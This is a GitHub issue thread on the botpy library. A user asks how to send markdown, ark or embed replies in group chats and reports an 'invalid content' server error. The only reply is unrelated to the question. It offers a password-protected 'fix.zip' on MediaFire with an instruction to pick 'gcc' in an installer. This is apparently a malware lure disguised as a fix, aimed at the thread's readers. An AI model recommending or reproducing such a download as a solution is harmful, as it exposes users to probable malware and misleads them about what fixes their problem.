### ISSUE TITLE
怎么在群聊中回复markdown或者ark或者embed？

### ISSUE THREAD

**Issue by axiangcoding** [tencent-connect/botpy#210]
根据代码填充参数，但是都会报错 `botpy.errors.ServerError: invalid content`

已知我的bot有ark被动响应的权限了

**Comment by WaveListenToMe** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
